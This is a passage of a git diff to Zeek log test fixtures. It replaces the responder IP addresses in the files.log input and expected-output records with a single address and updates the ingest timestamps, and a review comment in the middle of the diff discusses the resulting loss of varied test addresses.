+{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"}
+{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"}
+{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["89.160.20.156"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"}
+{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
+{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
+{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
 {"ts":1617069792.519193,"fuid":"FSMkdM3YUSoEVpLZN4","tx_hosts":["169.254.169.254"],"rx_hosts":["10.156.0.2"],"conn_uids":["CgbPEj2jf5Ca7Lw0x2"],"source":"HTTP","depth":0,"analyzers":["SHA1","MD5"],"mime_type":"text/html","duration":0.00005316734313964844,"local_orig":false,"is_orig":false,"seen_bytes":1609,"total_bytes":1609,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"1ab1d3a926a99ccfc25acccc5b4289b4","sha1":"1895628784b47ad8da112c699a1b21f5b49c2b80"}
-{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
-{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/dhcp.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
+{"ts":1617069793.669729,"fuid":"F1msmE2xRFsdvL2iI","tx_hosts":["89.160.20.156"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vua63rzjtLaiefyj"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
+{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/dhcp.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json index 8cda6e11c7e..f431a34ebaa 100644 --- a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json +++ b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "server": { - "ip": "35.199.178.4" + "ip": "89.160.20.156" }, "@timestamp": "2019-01-17T01:33:16.636Z", "file": { @@ -21,7 +21,7 @@ "a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436" ], "ip": [ - "35.199.178.4", + "89.160.20.156", "10.178.98.102" ] }, @@ -32,7 +32,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "35.199.178.4", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, 
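Review bot: Every SSL record on the new side of this hunk now has the identical `tx_hosts` value `89.160.20.156`, so the fixture no longer carries three distinct public responders (the old side had 35.199.178.4, 17.134.127.250 and 104.154.89.105), and a pipeline regression that set `server.ip`/`related.ip` from the wrong record would no longer be visible in the expected output. If the supported subset offers more than one address, spreading a second one across the records would keep that coverage at no cost. The `169.254.169.254` context record is correctly left alone, since a link-local metadata-service address is not a public IP and should not be geo-enriched. The re-added Splunk-wrapped record still says `"source":"/usr/local/var/log/zeek/dhcp.log"` inside a files.log fixture; that predates this change, but `"source":"/usr/local/var/log/zeek/files.log"` would be the accurate value while the line is being rewritten anyway.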
@@ -57,8 +57,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826676700Z", - "original": "{\"ts\":1547688796.636812,\"fuid\":\"FMkioa222mEuM2RuQ9\",\"tx_hosts\":[\"35.199.178.4\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C8I0zn3r9EPbfLgta6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":947,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"79e4a9840d7d3a96d7c04fe2434c892e\",\"sha1\":\"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436\"}", + "ingested": "2021-12-09T13:51:00.753332400Z", + "original": "{\"ts\":1547688796.636812,\"fuid\":\"FMkioa222mEuM2RuQ9\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C8I0zn3r9EPbfLgta6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":947,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"79e4a9840d7d3a96d7c04fe2434c892e\",\"sha1\":\"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C8I0zn3r9EPbfLgta6", @@ -75,7 +75,7 @@ }, { "server": { - "ip": "17.134.127.250" + "ip": "89.160.20.156" }, "@timestamp": "2019-01-17T01:33:21.566Z", "file": { @@ -94,7 +94,7 @@ "b88d13fe319d342e7a808ce3a0a1158111fc3c2a" ], "ip": [ - "17.134.127.250", + "89.160.20.156", "10.178.98.102" ] }, @@ -105,7 +105,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "17.134.127.250", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, 
@@ -130,8 +130,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826692200Z", - "original": "{\"ts\":1547688801.566262,\"fuid\":\"FShtIS1gydeSFf8M63\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":2089,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"b9742f12eb97eff531d94f7800c6706c\",\"sha1\":\"b88d13fe319d342e7a808ce3a0a1158111fc3c2a\"}", + "ingested": "2021-12-09T13:51:00.753340900Z", + "original": "{\"ts\":1547688801.566262,\"fuid\":\"FShtIS1gydeSFf8M63\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":2089,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"b9742f12eb97eff531d94f7800c6706c\",\"sha1\":\"b88d13fe319d342e7a808ce3a0a1158111fc3c2a\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6sjVo23iNApLnlAt6", @@ -148,7 +148,7 @@ }, { "server": { - "ip": "17.134.127.250" + "ip": "89.160.20.156" }, "@timestamp": "2019-01-17T01:33:21.566Z", "file": { @@ -167,7 +167,7 @@ "8e8321ca08b08e3726fe1d82996884eeb5f0d655" ], "ip": [ - "17.134.127.250", + "89.160.20.156", "10.178.98.102" ] }, @@ -178,7 +178,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "17.134.127.250", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, 
@@ -203,8 +203,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826699900Z", - "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", + "ingested": "2021-12-09T13:51:00.753346700Z", + "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6sjVo23iNApLnlAt6", @@ -221,7 +221,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:02:43.671Z", "file": { @@ -242,7 +242,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -254,7 +254,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, 
@@ -280,8 +280,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826774400Z", - "original": "{\"ts\":1617069763.671838,\"fuid\":\"Fe722V1qt2DSlqCiOa\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"ClG5ErV7bkgKgOaV\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753352300Z", + "original": "{\"ts\":1617069763.671838,\"fuid\":\"Fe722V1qt2DSlqCiOa\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"ClG5ErV7bkgKgOaV\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "ClG5ErV7bkgKgOaV", @@ -298,7 +298,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:02:53.678Z", "file": { @@ -319,7 +319,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, 
@@ -331,7 +331,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -357,8 +357,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826785100Z", - "original": "{\"ts\":1617069773.678327,\"fuid\":\"FYszs61e8hIUWMWgL5\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CaB3fq3yLrKCbYLqr4\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753359800Z", + "original": "{\"ts\":1617069773.678327,\"fuid\":\"FYszs61e8hIUWMWgL5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CaB3fq3yLrKCbYLqr4\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CaB3fq3yLrKCbYLqr4", @@ -375,7 +375,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:03:03.678Z", "file": { 
@@ -396,7 +396,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -408,7 +408,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -434,8 +434,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826810200Z", - "original": "{\"ts\":1617069783.678588,\"fuid\":\"FdGWZq2wRIvCfjvdI5\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vhl91PPOI7LbrPZ8\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753365500Z", + "original": "{\"ts\":1617069783.678588,\"fuid\":\"FdGWZq2wRIvCfjvdI5\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vhl91PPOI7LbrPZ8\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C0vhl91PPOI7LbrPZ8", 
@@ -507,7 +507,7 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826815100Z", + "ingested": "2021-12-09T13:51:00.753370900Z", "original": "{\"ts\":1617069792.519193,\"fuid\":\"FSMkdM3YUSoEVpLZN4\",\"tx_hosts\":[\"169.254.169.254\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"CgbPEj2jf5Ca7Lw0x2\"],\"source\":\"HTTP\",\"depth\":0,\"analyzers\":[\"SHA1\",\"MD5\"],\"mime_type\":\"text/html\",\"duration\":0.00005316734313964844,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1609,\"total_bytes\":1609,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"1ab1d3a926a99ccfc25acccc5b4289b4\",\"sha1\":\"1895628784b47ad8da112c699a1b21f5b49c2b80\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -525,7 +525,7 @@ }, { "server": { - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "@timestamp": "2021-03-30T02:03:13.669Z", "file": { @@ -546,7 +546,7 @@ "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74" ], "ip": [ - "104.154.89.105", + "89.160.20.156", "10.156.0.2" ] }, @@ -558,7 +558,7 @@ "timedout": false, "sha256": "1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74", "local_orig": false, - "tx_host": "104.154.89.105", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, 
@@ -584,8 +584,8 @@ "ip": "10.156.0.2" }, "event": { - "ingested": "2021-08-11T19:18:26.826818800Z", - "original": "{\"ts\":1617069793.669729,\"fuid\":\"F1msmE2xRFsdvL2iI\",\"tx_hosts\":[\"104.154.89.105\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vua63rzjtLaiefyj\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", + "ingested": "2021-12-09T13:51:00.753376300Z", + "original": "{\"ts\":1617069793.669729,\"fuid\":\"F1msmE2xRFsdvL2iI\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.156.0.2\"],\"conn_uids\":[\"C0vua63rzjtLaiefyj\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"SHA256\",\"SHA1\",\"MD5\"],\"mime_type\":\"application/x-x509-user-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":893,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"5abbc8a9137f6924861596848b7d7794\",\"sha1\":\"99c1daf07c8d69a8a065492dcaae43c43ff13497\",\"sha256\":\"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C0vua63rzjtLaiefyj", @@ -602,7 +602,7 @@ }, { "server": { - "ip": "17.134.127.250" + "ip": "89.160.20.156" }, "log": { "file": { @@ -616,7 +616,7 @@ ], "timedout": false, "local_orig": false, - "tx_host": "17.134.127.250", + "tx_host": "89.160.20.156", "source": "SSL", "is_orig": false, "overflow_bytes": 0, @@ -657,7 +657,7 @@ "8e8321ca08b08e3726fe1d82996884eeb5f0d655" ], "ip": [ - "17.134.127.250", + "89.160.20.156", "10.178.98.102" ] }, 
@@ -668,8 +668,8 @@ "ip": "10.178.98.102" }, "event": { - "ingested": "2021-08-11T19:18:26.826822600Z", - "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"17.134.127.250\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", + "ingested": "2021-12-09T13:51:00.753381700Z", + "original": "{\"ts\":1547688801.566262,\"fuid\":\"F9ip9a3MDAq3XLBOn2\",\"tx_hosts\":[\"89.160.20.156\"],\"rx_hosts\":[\"10.178.98.102\"],\"conn_uids\":[\"C6sjVo23iNApLnlAt6\"],\"source\":\"SSL\",\"depth\":0,\"analyzers\":[\"X509\",\"MD5\",\"SHA1\"],\"mime_type\":\"application/pkix-cert\",\"duration\":0.0,\"local_orig\":false,\"is_orig\":false,\"seen_bytes\":1092,\"missing_bytes\":0,\"overflow_bytes\":0,\"timedout\":false,\"md5\":\"48f0e38385112eeca5fc9ffd402eaecd\",\"sha1\":\"8e8321ca08b08e3726fe1d82996884eeb5f0d655\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "C6sjVo23iNApLnlAt6", diff --git a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json index afb2a004543..80ed77ec353 100644 --- a/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json +++ b/packages/zeek/data_stream/ftp/_dev/test/pipeline/test-ftp.log-expected.json 
@@ -51,7 +51,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:27.615408300Z", + "ingested": "2021-12-09T13:51:01.440342Z", "original": "{\"ts\":1187379104.955342,\"uid\":\"CpQoCn3o28tke89zv9\",\"id.orig_h\":\"192.168.1.182\",\"id.orig_p\":62014,\"id.resp_h\":\"192.168.1.231\",\"id.resp_p\":21,\"user\":\"ftp\",\"password\":\"ftp\",\"command\":\"EPSV\",\"reply_code\":229,\"reply_msg\":\"Entering Extended Passive Mode (|||37100|)\",\"data_channel.passive\":true,\"data_channel.orig_h\":\"192.168.1.182\",\"data_channel.resp_h\":\"192.168.1.231\",\"data_channel.resp_p\":37100}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -119,7 +119,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:27.615419200Z", + "ingested": "2021-12-09T13:51:01.440350900Z", "original": 